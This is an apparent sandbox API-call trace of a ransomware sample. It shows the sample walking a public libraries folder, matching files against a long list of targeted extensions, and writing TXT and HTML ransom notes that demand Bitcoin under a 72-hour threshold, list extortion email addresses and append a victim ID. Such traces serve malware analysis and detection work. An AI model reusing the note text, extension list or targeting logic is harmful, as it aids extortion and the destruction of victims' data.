	[0180.761] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\libraries\\desktop.ini" | out: lpString1="c:\\users\\public\\libraries\\desktop.ini") returned="c:\\users\\public\\libraries\\desktop.ini"
	[0180.761] lstrlenW (lpString="c:\\users\\public\\libraries\\desktop.ini") returned 37
	[0180.762] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.762] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.762] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.762] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1
	[0180.763] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1
	[0180.763] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1
	[0180.763] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\"
	[0180.763] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms" | out: lpString1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms"
	[0180.763] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47
	[0180.763] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.763] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", cchLength=0x2f | out: lpsz="c:\\users\\public\\libraries\\recordedtv.library-ms") returned 0x2f
	[0180.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.763] StrStrW (lpFirst="c:\\users\\public\\libraries\\recordedtv.library-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.764] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\libraries\\recordedtv.library-ms" | out: lpString1="c:\\users\\public\\libraries\\recordedtv.library-ms") returned="c:\\users\\public\\libraries\\recordedtv.library-ms"
	[0180.764] lstrlenW (lpString="c:\\users\\public\\libraries\\recordedtv.library-ms") returned 47
	[0180.764] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.764] StrStrW (lpFirst=".library-ms", lpSrch=".") returned=".library-ms"
	[0180.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.764] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".library-ms") returned 0x0
	[0180.765] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0
	[0180.765] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.765] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.765] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries"
	[0180.765] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*"
	[0180.766] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.766] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.766] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0180.766] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\libraries\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.774] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.774] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.777] CloseHandle (hObject=0x380) returned 1
	[0180.777] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.778] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.779] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.779] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\libraries\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.779] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.779] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.779] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.779] CloseHandle (hObject=0x380) returned 1
	[0180.780] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.780] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.780] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.780] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.780] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\libraries\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.781] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.781] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.785] CloseHandle (hObject=0x380) returned 1
	[0180.785] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
